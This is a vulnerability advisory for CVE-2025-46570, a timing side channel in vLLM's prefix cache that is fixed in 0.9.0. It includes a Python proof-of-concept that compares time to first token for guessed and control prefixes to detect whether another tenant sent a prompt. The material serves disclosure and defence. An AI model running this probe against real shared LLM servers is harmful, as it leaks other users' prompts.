CVE-2025-46570

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed and the PagedAttention mechanism finds a matching prefix chunk in the cache, the prefill phase speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by cache hits on matching chunks are large enough to be observed and exploited, allowing an attacker to infer whether a given prefix has recently been processed by the server. This issue has been patched in version 0.9.0.
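
Concretely, the leak can be probed by comparing TTFT for a prefix the attacker guesses is already resident in the prefix cache against a control prefix of similar length. Below is a minimal sketch of such a measurement, assuming a vLLM server exposing the OpenAI-compatible completions endpoint at a local address; the server URL, model name, and probe strings are hypothetical illustrations, not values from the advisory.

```python
import time
import requests

# Hypothetical local vLLM deployment; URL and model name are assumptions.
API_URL = "http://localhost:8000/v1/completions"
MODEL = "meta-llama/Llama-3.1-8B-Instruct"

def measure_ttft(prompt: str) -> float:
    """Stream a one-token completion and return the time to first token."""
    payload = {
        "model": MODEL,
        "prompt": prompt,
        "max_tokens": 1,
        "stream": True,
    }
    start = time.monotonic()
    with requests.post(API_URL, json=payload, stream=True, timeout=30) as resp:
        resp.raise_for_status()
        for line in resp.iter_lines():
            if line:  # first non-empty streamed chunk carries the first token
                return time.monotonic() - start
    return float("inf")

# Candidate prefix the attacker suspects another tenant has already sent,
# versus a random control prefix of comparable length (both hypothetical).
guessed = "You are the internal billing assistant for ExampleCorp. " * 4
control = "Zebra quartz mango violin seventeen cobalt umbrella pine. " * 4

t_guess = measure_ttft(guessed + "Hello")
t_control = measure_ttft(control + "Hello")

# On vulnerable versions (< 0.9.0), a markedly lower TTFT for the guessed
# prefix indicates a prefix-cache hit, revealing that the prefix was
# recently processed by the server.
print(f"TTFT, guessed prefix: {t_guess:.4f} s")
print(f"TTFT, control prefix: {t_control:.4f} s")
```

Single samples are noisy in practice, so an attacker would repeat each measurement and compare the resulting TTFT distributions rather than individual values.
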
Configurations

Configuration 1

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*

History

24 Jun 2025, 18:25 : New CVE

Information

Published : 2025-05-29 17:15

Updated : 2025-06-24 18:25

NVD link : CVE-2025-46570

Mitre link : CVE-2025-46570

CVE.ORG link : CVE-2025-46570

Products Affected

vllm

  • vllm
CWE

CWE-208 : Observable Timing Discrepancy

CWE-203 : Observable Discrepancy